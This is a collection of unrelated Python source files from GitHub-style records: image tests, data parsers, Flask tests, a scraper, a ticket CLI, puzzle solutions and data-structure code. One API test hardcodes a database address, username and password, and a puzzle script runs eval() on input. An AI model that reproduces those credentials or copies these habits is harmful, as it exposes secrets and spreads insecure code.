corners of a squares\n #print('Converted value of XY=( 0.0, 0.0)mm is', tim1.XYmm2RC( 0.0, 0.0))\n #print('Converted value of XY=(50.0,25.0)mm is', tim1.XYmm2RC( 50.0,25.0))\n fs = 'mm to pixel conversion ERROR'\n assert tim1.XYmm2RC( 0.0, 0.0) == (544,810), fs\n assert tim1.XYmm2RC( 50.0,25.0) == (419,1060), fs\n assert tim1.XYmm2RC( 50.0, 0.0) == (544,1060), fs\n assert tim1.XYmm2RC( 0.0,25.0) == (419,810), fs\n \n printpass('XYmm2RC tests')\n \n rtst = 100\n ctst = 250\n \n pxymm = tim1.RC2XYmm(rtst,ctst)\n assert tim1.XYmm2RC(pxymm[0],pxymm[1]) == (rtst,ctst), 'RC->XY->RC FAILS'\n \n printpass('XYmm2RC(RC2XYmm(R,C) test')\n \n ## TEST row,col to mm\n \n print('Converted value of ', int(tim1.rows/2), int(tim1.cols/2),' is ', tim1.RC2XYmm(tim1.rows/2,tim1.cols/2))\n fs = 'pixel to mm conversion ERROR'\n x = tim1.RC2XYmm(tim1.rows/2,tim1.cols/2)\n assert approx(x[0],0.0), fs\n assert approx(x[1],0.0), fs\n \n \n x = tim1.RC2XYmm(tim1.rows/2+10,tim1.cols/2+20)\n #print(' 10, 20 px more: ', x)\n assert approx(x[0], 4), fs\n assert approx(x[1], -2), fs\n \n printpass('center conversion tests')\n \n ##\n #\n # Test icopy() vs make new image\n #\n \n tst_icop = tim1.icopy()\n tst_newbI = bookImage(tim1.image, tim1.scale)\n \n #assert tst_icop.image == tst_newbI.image, 'image mismatch'\n assert tst_icop.scale == tst_newbI.scale, 'scale mismatch'\n assert tst_icop.height_mm == tst_newbI.height_mm, 'height_mm mismatch'\n assert tst_icop.width_mm == tst_newbI.width_mm, 'width_mm mismatch'\n assert tst_icop.rows == tst_newbI.rows, 'rows mismatch'\n assert tst_icop.cols == tst_newbI.cols, 'cols mismatch'\n assert tst_icop.ctXmm == tst_newbI.ctXmm, 'ctXmm mismatch'\n assert tst_icop.ctYmm == tst_newbI.ctYmm, 'ctYmm mismatch'\n\n printpass('copy vs. newinstance')\n \n \n #\n # test drawing\n #\n \n # Place marks in right places:\n \n tim1.Dmark_mm(( 0.0, 0.0), 2, 'red')\n tim1.Dmark_mm(( 10.0, 0.0), 2, 'red')\n tim1.Dmark_mm(( 20.0,10.0), 2, 'red')\n tim1.Dmark_mm(( -10.0,-50.0), 2, 'red')\n \n # test rectangle drawing\n # (should be predominantly horizontal)\n tim1.Drect_mm( (-80,-20), (-10,-10), 'green')\n \n # pixel line from one corner (almost) to the other\n tim1.Dline_px( (10,10), (1079,1610),'red')\n \n # draw some test lines in px:\n \n for i in range(10):\n r = 50*i\n midpoint = int(tim1.cols/2)\n p1 = (r,midpoint)\n p2 = (r,midpoint+500)\n tim1.Dline_px(p1,p2,'yellow',width=2)\n \n for i in range(10):\n ymm = 100 - 50*tim1.scale*i\n midpoint = 0.0\n xmm = midpoint\n p1 = (xmm, ymm)\n p2 = (xmm+500*tim1.scale, ymm)\n tim1.Dline_mm(p1, p2,'white')\n \n tim1.Dline_px( (544,810), (544-250,810+125), 'white')\n \n # pixel line from origin to +x and +y values\n tim1.Dline_mm( (0,0), (50,25), 'green')\n \n \n title='test image'\n cv2.imshow(title, tim1.image)\n cv2.waitKey(5000)\n \n #######################################################################33 Scale Down\n #\n # Now try similar tests with scaled image\n #\n #tim2 = bookImage(cv2.imread(pic_filename, cv2.IMREAD_COLOR), mm_per_pixel).downvert(4.0)\n print('\\n\\n----------------------------------')\n print('original image;')\n tim1.ishape()\n tim2 = tim1.icopy()\n print('generating scaled test image: ')\n tim2 = tim1.downvert(4.0) \n tim2.ishape()\n\n #tim2.Dxy_axes()\n tim2.Dline_px((100,100),(200,400),'green') \n tim2.Dmark_px((200,200),14,'yellow')\n tim2.Dmark_px((200,300),14,'blue')\n \n \n # Plot a line in mm on scaled image\n th = 145\n xintercept = 80\n llength = bpar.book_edge_line_length_mm\n bias = -20\n ld2 = nf.Get_line_params(th, xintercept, llength, bias)\n tim2.Dline_ld(ld2,'white')\n \n ### draw mm coordinate system\n tim2.Dxy_axes()\n \n cv2.imshow('Scaled Down Test',tim2.image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \n \n \n","repo_name":"blake5634/Book-Spine_2","sub_path":"book_classes.py","file_name":"book_classes.py","file_ext":"py","file_size_in_byte":12939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19517296027","text":"import numpy as np\nimport pandas as pd\nimport scipy.io\n\n\ndef get_Sondata(filename):\n with open(filename, 'r') as file:\n Sonfile = []\n line = file.readline()\n while line != \"\":\n dataset = {'Header': [], 'Params': {}, 'Data': []}\n while (line.split(' ')[0] not in ['R', 'TERM', 'FTERM'] and '=' not in line) and line != \"\":\n if line.split(' ')[0] == 'FTERM':\n for i in range(3):\n dataset['Header'].append(line.replace('\\n', ''))\n line = file.readline()\n else:\n dataset['Header'].append(line.replace('\\n', ''))\n line = file.readline()\n dataset['Header'].append(line.replace('\\n', ''))\n colnames = file.readline().replace('\\n', '').split(',')\n dataset['Data'] = pd.DataFrame(columns=colnames)\n line = file.readline()\n while \"=\" in line:\n Param, Val = line.replace(' ', '').split('=')\n dataset['Params'][Param] = float(Val)\n line = file.readline()\n ind = 0\n while np.fromstring(line, sep=',').size == len(colnames):\n dataset['Data'].loc[ind] = np.fromstring(\n line.replace('\\n', ''), sep=\",\"\n )\n ind += 1\n line = file.readline()\n Sonfile.append(dataset)\n return Sonfile\n\n\ndef gen_Qdesign(Soncsv, savemat=False, matname=\"Qdesign\"):\n # Make Qdesign array for Matlab select_Classicdesign()\n numcol = 1 + len(Soncsv)\n numrow = 1 + len(Soncsv[0][\"Data\"].index)\n Qdesign = np.zeros((numrow, numcol))\n Qdesign[0, 1:] = [Soncsv[i][\"Params\"][\"Lc\"] for i in range(len(Soncsv))]\n Qdesign[1:, 0] = Soncsv[0][\"Data\"][\"Frequency (GHz)\"].values\n for i, dataset in enumerate(Soncsv):\n Lc = dataset[\"Params\"][\"Lc\"]\n for j, freq in enumerate(dataset[\"Data\"][\"Frequency (GHz)\"].values):\n if freq in Qdesign[:, 0] and Lc in Qdesign[0, :]:\n Qdesign[Qdesign[:, 0] == freq, Qdesign[0, :] == Lc] = np.log10(\n np.pi / (2 * (10 ** (dataset[\"Data\"][\"DB[S13]\"].iloc[j] / 20)) ** 2)\n )\n\n assert (\n 0 not in Qdesign[1:, 1:]\n ), \"Data not complete: probably ABS frequency Sonnet data\"\n if savemat:\n scipy.io.savemat(matname + \".mat\", dict(Qdesign=Qdesign))\n return Qdesign\n","repo_name":"sahderooij/MKID-models","sub_path":"kidesign/simdata.py","file_name":"simdata.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21001834315","text":"import json\nimport unittest\nimport session_example.app as app\n\n\nclass SessionExampleTest(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(SessionExampleTest, self).__init__(*args, **kwargs)\n\n def setUp(self):\n self.app_sess1 = app.app.test_client()\n self.app_sess2 = app.app.test_client()\n\n def test_new_session_no_cookie(self):\n \"\"\" Test that we get a new cookie if we send a new, bare request \"\"\"\n\n with self.app_sess1 as c:\n ret = c.get('/')\n self.assertIn('Set-Cookie', ret.headers)\n\n def test_existing_session_cookie(self):\n \"\"\" Test that two requests in the same session has the same session data \"\"\"\n\n with self.app_sess1 as c:\n ret1 = c.get('/')\n ret2 = c.get('/')\n self.assertEqual(ret1.data, ret2.data)\n\n def test_distinct_sessions_cookie(self):\n \"\"\" Test that two distinct requests are distinct sessions \"\"\"\n\n sess1 = None\n sess2 = None\n with self.app_sess1 as c:\n sess1 = c.get('/').data\n\n with self.app_sess2 as c:\n sess2 = c.get('/').data\n\n self.assertNotEqual(sess1, sess2)\n\n def test_new_session_no_cookie_auth_token(self):\n \"\"\" Test that no cookie is sent back in the response when x-auth-token header is set \"\"\"\n\n with self.app_sess1 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n self.assertNotIn('Set-Cookie', ret.headers)\n\n def test_new_session_created_with_auth_json_no_cookie(self):\n \"\"\" Test that no cookie is sent with the response if a new session is created with a \"token\"\n key present in a JSON request.\n \"\"\"\n\n with self.app_sess1 as c:\n data = {\n \"token\": \"pretend_token\"\n }\n ret = c.post('/', data=json.dumps(data), headers={'Content-Type': 'application/json'})\n self.assertNotIn('Set-Cookie', ret.headers)\n\n def test_new_session_create_with_auth_json(self):\n \"\"\" Test that a new session is created when a \"token\" key is present in a JSON request\n body.\n \"\"\"\n\n with self.app_sess1 as c:\n data = {\n \"token\": \"pretend_token\"\n }\n ret1 = c.post('/', data=json.dumps(data), headers={'Content-Type': 'application/json'})\n ret2 = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n\n self.assertEqual(ret1.data, ret2.data)\n\n def test_session_auth_token(self):\n \"\"\" Test that sending a token in x-auth-token creates a session \"\"\"\n\n sess1 = None\n sess2 = None\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret = c.get('/', headers=test_header)\n sess1 = ret.data\n\n with self.app_sess2 as c:\n ret = c.get('/', headers=test_header)\n sess2 = ret.data\n\n self.assertEqual(sess1, sess2)\n\n def test_distinct_sessions_auth_token(self):\n \"\"\" Test that two distinct auth tokens result in distinct sessions \"\"\"\n\n sess1 = None\n sess2 = None\n\n with self.app_sess1 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n sess1 = ret.data\n\n with self.app_sess2 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'another_pretend_token'})\n sess2 = ret.data\n\n self.assertNotEqual(sess1, sess2)\n\n def test_existing_session_auth_token(self):\n \"\"\" Test that two requests in the same session has the same session data (using token) \"\"\"\n\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret1 = c.get('/', headers=test_header)\n ret2 = c.get('/', headers=test_header)\n self.assertEqual(ret1.data, ret2.data)\n","repo_name":"eljrax/flask_token_cookie_sessions","sub_path":"app/tests/test_session_example.py","file_name":"test_session_example.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41187180140","text":"import os\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom download_plane_data import parse_plane\nfrom download_planes_list import download_plane_list\n\nbase_url = \"https://www.airfleets.net\"\n# List of the plane models to parse\nplane_list_file = \"planes_list.csv\"\n# Actual file to store data from\n# every plane in the webpage\nplanes_file = \"planes.csv\"\n\n# If we already have the list of planes open it\n# Otherwise create the list extracting it from the webpage\nif not os.path.isfile(plane_list_file):\n planes = download_plane_list(base_url)\n df = pd.DataFrame(planes, columns=[\"plane_name\", \"link\"])\n df.to_csv(plane_list_file, index=True)\n\ndf = pd.read_csv(plane_list_file)\n\nplanes_matrix = df.as_matrix()\n# Continue progress if the data file already exists\n# By checking last plane downloaded.\nif not os.path.isfile(planes_file):\n df_planes = pd.DataFrame(\n columns=(\"plane_name\", \"msn\", \"type\", \"airline\", \"first_flight\", \"registration\", \"status\")\n )\n df_planes.to_csv(planes_file, index=False)\nelse:\n last_plane_scrapped = pd.read_csv(planes_file)[\"plane_name\"].values[-1]\n index = df[df[\"plane_name\"] == last_plane_scrapped].index[-1] + 1\n print(f\"Starting at {planes_matrix[index, 1]}\")\n planes_matrix = planes_matrix[index:]\n\nfor plane in planes_matrix:\n planes_data = []\n empty_page = False\n page_number = 1\n plane_data_url = f\"{base_url}{plane[2]}\"\n plane_name = plane[1]\n # Loop over page numbers\n while not empty_page:\n plane_page_data = parse_plane(plane_data_url, plane_name)\n time.sleep(3)\n page_number += 1\n plane_data_url = plane_data_url.replace(f\"{page_number - 1}.htm\", f\"{page_number}.html\")\n if not plane_page_data:\n empty_page = True\n else:\n planes_data += plane_page_data\n # Save current data\n df_planes = pd.DataFrame(\n planes_data,\n columns=(\"plane_name\", \"msn\", \"type\", \"airline\", \"first_flight\", \"registration\", \"status\"),\n )\n pd.concat([pd.read_csv(planes_file), df_planes]).to_csv(planes_file, index=False, header=True)\n print(f\"{plane_name}\")\n","repo_name":"Gonzalo933/world_airfleets_data","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29183671145","text":"tickets = []\r\n\r\ndef create_ticket(ticket_id, title, description):\r\n ticket = {\r\n \"ticket_id\": ticket_id,\r\n \"title\": title,\r\n \"description\": description,\r\n \"status\": \"Open\"\r\n }\r\n tickets.append(ticket)\r\n print(\"Ticket created successfully.\")\r\n\r\ndef view_tickets():\r\n if not tickets:\r\n print(\"No tickets available.\")\r\n else:\r\n print(\"All Tickets:\")\r\n for ticket in tickets:\r\n print(\"Ticket ID: \",ticket['ticket_id'])\r\n print(\"Title: \",ticket['title'])\r\n print(\"Description: \",ticket['description'])\r\n print(\"Status: \",ticket['status'])\r\n print(\"-------------------------\")\r\n\r\ndef update_ticket_status(ticket_id, status):\r\n for ticket in tickets:\r\n if ticket[\"ticket_id\"] == ticket_id:\r\n ticket[\"status\"] = status\r\n print(\"Ticket status updated successfully.\")\r\n return\r\n print(\"Ticket not found.\")\r\n\r\ndef delete_ticket(ticket_id):\r\n for ticket in tickets:\r\n if ticket[\"ticket_id\"] == ticket_id:\r\n tickets.remove(ticket)\r\n print(\"Ticket deleted successfully.\")\r\n return\r\n print(\"Ticket not found.\")\r\n\r\ndef customer_menu():\r\n while True:\r\n print(\"\\n--- Customer Menu ---\")\r\n print(\"1. Create a ticket\")\r\n print(\"2. View all tickets\")\r\n print(\"3. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-3): \")\r\n\r\n if choice == \"1\":\r\n ticket_id = input(\"Enter ticket ID: \")\r\n title = input(\"Enter ticket title: \")\r\n description = input(\"Enter ticket description: \")\r\n create_ticket(ticket_id, title, description)\r\n\r\n elif choice == \"2\":\r\n view_tickets()\r\n\r\n elif choice == \"3\":\r\n print(\"Exiting the customer menu...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\ndef manager_menu():\r\n while True:\r\n print(\"\\n--- Manager Menu ---\")\r\n print(\"1. View all tickets\")\r\n print(\"2. Update ticket status\")\r\n print(\"3. Delete a ticket\")\r\n print(\"4. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-4): \")\r\n\r\n if choice == \"1\":\r\n view_tickets()\r\n\r\n elif choice == \"2\":\r\n ticket_id = input(\"Enter ticket ID to update status: \")\r\n status = input(\"Enter new status: \")\r\n update_ticket_status(ticket_id, status)\r\n\r\n elif choice == \"3\":\r\n ticket_id = input(\"Enter ticket ID to delete: \")\r\n delete_ticket(ticket_id)\r\n\r\n elif choice == \"4\":\r\n print(\"Exiting the manager menu...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\ndef menu():\r\n while True:\r\n print(\"\\n--- Helpdesk Management System ---\")\r\n print(\"1. Customer Menu\")\r\n print(\"2. Manager Menu\")\r\n print(\"3. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-3): \")\r\n\r\n if choice == \"1\":\r\n customer_menu()\r\n\r\n elif choice == \"2\":\r\n manager_menu()\r\n\r\n elif choice == \"3\":\r\n print(\"Exiting the program...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\nmenu()\r\n","repo_name":"ishwaribarne/LP2.github.io","sub_path":"LP2_Codes/LP2_Codes/EX_helpDesk.py","file_name":"EX_helpDesk.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16043053462","text":"input = [a.strip() for a in open('./13/input.txt', 'r')]\npairs = [(int(i/3+1),input[i],input[i+1]) for i in range(0,(len(input)),3)]\n\ndef checkPairs(left, right) : # 1 correct order, 0 equal, -1 wrong\n if type(left) == int and type(right) is int:\n return 1 if left < right else -1 if right < left else 0\n\n if type(left) is list and type(right) is int : right = [right]\n if type(left) is int and type(right) is list : left = [left]\n\n for i in range(0,len(left)) :\n if i >= len(right) : return -1\n c = checkPairs(left[i],right[i])\n if c != 0 : return c\n \n return 1 if len(left) < len(right) else 0\n\nresults = [(a[0],checkPairs(eval(a[1]), eval(a[2]))) for a in pairs]\nprint(f'Part A: Sum of correct pairs Idx {sum([r[0] for r in results if r[1] == 1])}') # assert 13\n\ninput = [i for i in input if i != ''] + ['[[2]]','[[6]]']\noutput = [input[0]]\nfor i in input[1:] :\n for o in range(0,len(output)) :\n if checkPairs(eval(output[o]), eval(i)) == -1:\n output.insert(o, i)\n break\n if i not in output : output.append(i)\n\nres = (output.index('[[2]]')+1) * (output.index('[[6]]')+1)\nprint(f'Part B: Packet decode {res}') # assert 140","repo_name":"DeclanOGorman/AdventofCode2022","sub_path":"13/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22484384889","text":"#coding:utf-8\nimport json,os,time\nfrom urllib.parse import urlencode\nimport requests\nimport unittest\nimport HTMLTestRunner\nfrom ddt import data,unpack,ddt\nimport sys\nimport dbclass\nfrom ExcelUtil import ExcelUtil\n\n\nqueryCountrysByCityId = ExcelUtil('isCommonCity.xlsx','queryCitysById')\nqueryCountryById = ExcelUtil('isCommonCity.xlsx','queryCountryById')\n@ddt\nclass Country(unittest.TestCase):\n def setUp(self):\n self.url = 'http://10.10.32.105/v1/'\n\n @data(*queryCountrysByCityId.next())\n def test_queryCountrysByCityId(self,data):\n u'''根据二级城市ID获取三级区县列表'''\n r =requests.get('http://10.10.32.105/v1/country/queryCountrysByCityId/'+str(data[0]))\n self.assertEqual(r.status_code,200,\"返回值应为200,实为:\"+str(r.status_code))\n db = dbclass.dbClass('10.10.20.108','jsjy','jsjy2015','common')\n r_data = json.loads(r.text)\n db_data =db.fetchall(\"SELECT id,city_id,name FROM m_county where status = 1 AND city_id = \"+ str(data[0]))\n num = len(r_data)\n for x in range(0,num):\n self.assertEqual(r_data[x]['id'],str(db_data[x]['id']))\n self.assertEqual(str(r_data[x]['cityId']),str(db_data[x]['city_id']))\n self.assertEqual(r_data[x]['name'],db_data[x]['name'])\n\n @data(*queryCountryById.next())\n def test_queryCountryById(self,data):\n u'''根据三级iD获取三级区县列表'''\n r = requests.get('http://10.10.32.105/v1/country/queryCountryById/'+str(data[0]))\n self.assertEqual(r.status_code,200,\"返回值应为200,实为:\"+str(r.status_code))\n r_data = json.loads(r.text)\n db = dbclass.dbClass('10.10.20.108','jsjy','jsjy2015','common')\n db_data =db.fetchall(\"SELECT * FROM m_county where id = \"+ str(data[0]))\n\n self.assertEqual(r_data['id'],str(db_data[0]['id']))\n self.assertEqual(str(r_data['cityId']),str(db_data[0]['city_id']))\n self.assertEqual(r_data['name'],db_data[0]['name'])","repo_name":"gilbert1989/depends","sub_path":"country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71326698690","text":"import codecs, re\nf = codecs.open('vk/MDK_0.txt','r','cp1251')\nr = f.readlines()\nf.close()\nx = []\n'''\nfor line in r:\n if not re.search('\\t|cerrar|editar|Me|Compartir|Sugerir|Adjuntar|foto|desarrolladores|vide|enlaces|nastya|evgenia|aleksandra|deos|gif|ginas|ksenia|segui|ivaro|Comentar|mostrar|Hace|temas|introducir|</.*?>|VK © 2014|debates|<video.*?>|Otros|advertising|CONTACTOS|Ilia|Darse|suscrito|Suscribirse|favoritos',line,re.IGNORECASE|re.UNICODE):\n x.append(line)\n'''\nl = open('mdk_text_final_0','w')\nn = ''\nauthor = ''\npost = ''\nfor line in r:\n if line.startswith(('Compartir','hace','<','Ocultar','el','ayer','Mostrar')):\n continue\n if line.endswith('>\\n'):\n author = re.sub('<.*>','',line).strip()\n continue\n if line.startswith('Me gusta'):\n post = '<message author= '+author+'>'+post+'</message>\\n'\n n += post\n post = ''\n else:\n line = re.sub('\\n',' ',line)\n line = re.sub('|Responder','',line)\n line = re.sub('<.*>','',line,re.DOTALL|re.IGNORECASE|re.UNICODE)\n post += line\nl.write(n)\nl.close()\n","repo_name":"denis-gordeev/parsers","sub_path":"vk.py","file_name":"vk.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3675689575","text":"print('Meal Cost -- ')\nmealCost = float(input())\n\nprint('Tip Percent -- ')\ntipPercent = int(input())\n\nprint('Tax Percent -- ')\ntaxPercent = int(input())\n\ntip = mealCost * tipPercent / 100\ntax = mealCost * taxPercent / 100\ntotalCost = mealCost + tip + tax\nprint(\"The total meal cost is \" + str(round(totalCost)) + \" dollars.\")","repo_name":"naimjeem/python-field","sub_path":"basic/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74719420608","text":"import os\nfrom ij import IJ\nimport glob\nfrom ij.plugin.frame import RoiManager\n\n_threshold_percent = 0.9\n\nbf_path = r\"C:\\Users\\johnp\\Box\\Finkelstein-Matouschek\\images\\20220325_Moment_Panda_Demo\\moment_data\\20220325_BY4741_no-plasmid_exp030s_moment_004_bf.tif\"\n\ndef get_percentile(imp, percentile):\n\n IJ.log(\"Segmenting brightfield with percentile threshold {}\".format(percentile))\n\n stats = imp.getRawStatistics()\n hist = stats.histogram()\n \n hist_x_min = stats.histMin\n hist_x_max = stats.histMax\n hist_x_range = hist_x_max - hist_x_min\n \n hist_x_values = []\n \n for bin in range(0, stats.nBins):\n \n #print(\"Fraction pixels with intensity in bins 0 to {}\".format(bin))\n integral = sum(hist[0:bin])/sum(hist)\n #print(integral)\n \n intensity = hist_x_range * bin/stats.nBins\n hist_x_values.append(intensity)\n \n #print(intensity)\n \n if integral > percentile:\n threshold_intensity = intensity\n break\n else:\n pass\n\n return threshold_intensity\n\ndef threshold_brightfield(imp, threshold_percent):\n # this code is based on my \"Threshold brightfield [Q]\" macro. Need to automate \n # finding threshold values instead of hardcoding themm here.\n IJ.run(\"Find Edges\")\n lower_threshold = get_percentile(imp, threshold_percent)\n IJ.setThreshold(lower_threshold, 65535)\n IJ.run(\"Convert to Mask\")\n IJ.run(\"Fill Holes\")\n IJ.run(\"Watershed\")\n \ndef create_rois():\n # Create rois based on (in this script) the process brightfield image.\n # Also scale the rois down using my plugin scale_rois.py\n IJ.run(\"Set Measurements...\", \"area mean standard min centroid center perimeter bounding fit feret's integrated median stack display redirect=None decimal=3\")\n IJ.run(\"Analyze Particles...\", \"size=100-8000 pixel circularity=0.60-1.00 exclude add in_situ\")\n \n#for i in range(-10, 10):\n#\tIJ.open(bf_path)\n#\timp = IJ.getImage()\n#\t\n#\tthreshold_value = _threshold_percent + i*0.01\n#\tthreshold_brightfield(imp, threshold_value)\n#\tcreate_rois()\n\n\nimp = IJ.getImage()\nthreshold_brightfield(imp, 0.85)","repo_name":"johnpcooper/imagejpc","sub_path":"plugins/scratch/stead_state_segmentation.py","file_name":"stead_state_segmentation.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"38608511169","text":"import os\nimport sys\nimport pytest\nfrom pathlib import Path\n\nsrc_dir = Path(__file__).resolve().parents[1]\nmodel_dir = os.path.join(src_dir, 'models')\nsys.path.append(model_dir)\n\nfrom hydra import initialize, compose\nfrom utils import parse_inputs\n\ndef test_parser():\n with initialize(version_base=None, config_path='../conf'):\n config = compose(config_name=\"config\")\n \n for k1 in config.keys():\n config[k1].hyperparameters.batch_size = 2.3\n \n with pytest.raises(ValueError, match=r\"invalid batch size\"):\n parse_inputs(config)\n \n config[k1].hyperparameters.batch_size = 32\n config[k1].hyperparameters.epochs = 2.3\n with pytest.raises(ValueError, match=r\"invalid epochs value\"):\n parse_inputs(config)\n \n config[k1].hyperparameters.epochs = 23\n parse_inputs(config)\n break\n","repo_name":"harshnehal1996/ML_OPS","sub_path":"src/tests/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"1385773389","text":"# flask packages\r\nfrom bson.json_util import json, dumps\r\nfrom bson import ObjectId\r\n# local packages\r\nfrom core.db import mongodb\r\n\r\nclass OrdersModel(): \r\n orders = mongodb['orders']\r\n\r\n def __init__(self, order):\r\n self.id = order['_id']\r\n self.action = order['action']\r\n self.symbol = order['symbol']\r\n self.price = order['price']\r\n self.order_type = order['order_type']\r\n self.order_size = order['order_size']\r\n self.value = order['value']\r\n self.account_id = order['account_id']\r\n\r\n def json(self):\r\n return {'action': self.action, 'symbol': self.symbol, 'price': self.price, 'value': self.value, 'order_type': self.order_type, 'order_size': self.order_size,'account_id': str(self.account_id)}\r\n\r\n @classmethod\r\n def find_by_order_id(cls, id):\r\n order = cls.orders.find_one({'_id' : ObjectId(id)}) \r\n if order:\r\n return OrdersModel(order)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def find_all_orders_by_account(cls, account_id):\r\n orders = cls.orders.find({'account_id' : ObjectId(account_id)}) \r\n return json.loads(dumps(orders)) if orders else None \r\n\r\n @classmethod\r\n def find_all_orders_by_user(cls, username):\r\n orders = cls.orders.find({'username' : username}) \r\n return json.loads(dumps(orders)) if orders else None \r\n\r\n def insert_to_db(self): # inserting data\r\n self.orders.insert({'action': self.action,\r\n 'symbol': self.symbol,\r\n 'price': self.price,\r\n 'order_type': self.order_type,\r\n 'order_size': self.order_size,\r\n 'value': self.value,\r\n 'account_id': ObjectId(self.account_id)})\r\n\r\n def update_to_db(self):\r\n myquery = { \"_id\": self.id }\r\n newvalues = { \"$set\": { \"action\": self.action,\r\n \"price\": self.price,\r\n \"order_type\": self.order_type,\r\n \"order_size\": self.order_size } }\r\n\r\n self.orders.update_one(myquery, newvalues)\r\n\r\n def delete_from_db(self):\r\n self.orders.delete_one({ \"_id\": ObjectId(self.id) })\r\n","repo_name":"ellett-huang/Python-Flask-Restful-API","sub_path":"models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26497356364","text":"from zad8testy import runtests\nfrom math import ceil, sqrt\nfrom collections import deque\n\n\ndef check_if_is_connected(edges, begging, ending, n):\n G = [[] for _ in range(n)]\n for i in range(begging, ending + 1):\n G[edges[i][0]].append(edges[i][1])\n G[edges[i][1]].append(edges[i][0])\n visited = [False for _ in range(n)]\n q = deque()\n q.append(edges[0][0])\n visited[edges[0][0]] = True\n number_of_visited = 1\n while q:\n u = q.popleft()\n for neighbour in G[u]:\n if not visited[neighbour]:\n number_of_visited += 1\n q.append(neighbour)\n visited[neighbour] = True\n if number_of_visited == n:\n return True\n return False\n\n\ndef binary_search(edges, start, begging, ending, n):\n if begging == ending:\n return begging\n mid = (begging + ending) // 2\n if check_if_is_connected(edges, start, mid, n):\n return binary_search(edges, start, begging, mid, n)\n else:\n return binary_search(edges, start, mid + 1, ending, n)\n\n\ndef highway(A):\n n = len(A)\n distance = [[ceil(sqrt(pow(A[i][0] - A[j][0], 2) + pow(A[i][1] - A[j][1], 2)))\n for i in range(j + 1)] for j in range(n)]\n edges = []\n for i in range(n):\n for j in range(i):\n edges.append((j, i, distance[i][j]))\n edges.sort(key=lambda x: x[2])\n\n minimal = edges[-1][2]\n for i in range(len(edges)):\n if check_if_is_connected(edges, i, len(edges) - 1, n):\n optimal = binary_search(edges, i, i, len(edges) - 1, n)\n if edges[optimal][2] - edges[i][2] < minimal:\n if check_if_is_connected(edges, i, optimal, n):\n minimal = edges[optimal][2] - edges[i][2]\n\n return minimal\n\n\nruntests(highway, all_tests=True)\n","repo_name":"WojciechBarczynski/Algorithms_and_Data_Structures","sub_path":"offline_tasks/offline8/zad8.py","file_name":"zad8.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40555506184","text":"class DoubleListNode:\n \"\"\"\n Double_LinkedList: In a doubly linked list, each node has a\n data element, a reference to the next node, and a reference\n to the previous node. This allows for traversal in both\n directions.\n \"\"\"\n\n def __init__(self, val: any, next=None, prev=None):\n self.prev = prev\n self.val = val\n self.next = next\n\n def list_append(lst: list[any]) -> [\"DoubleListNode\", \"DoubleListNode\"]:\n \"\"\"\n queue type insertion where data are added in bottom,\n insertion order is kept:\n insert(1)\n insert(2)\n insert(3)\n head->1<->2<->3<-tail\n\n returns list: [head, tail]\n \"\"\"\n head, tail = None, None\n for val in lst:\n temp = DoubleListNode(val, next=None, prev=None)\n if head == None and tail == None:\n head = temp\n tail = temp\n else:\n tail.next = temp\n temp.prev = tail\n tail = temp\n return [head, tail]\n\n def list_stack(lst: list(any)) -> list[\"DoubleListNode\", \"DoubleListNode\"]:\n \"\"\"\n stack type insertion where new data gets added to top,\n insertion order are reversed:\n insert(1)\n insert(2)\n insert(3)\n tail->1<->2<->3<-head\n\n returns list: [head, tail]\n \"\"\"\n head, tail = DoubleListNode.list_append(lst)\n return [tail, head]\n\n def list_print_head(head: \"DoubleListNode\"):\n temp = head\n while temp != None:\n if temp.next != None:\n print(temp.val, end=\"->\")\n 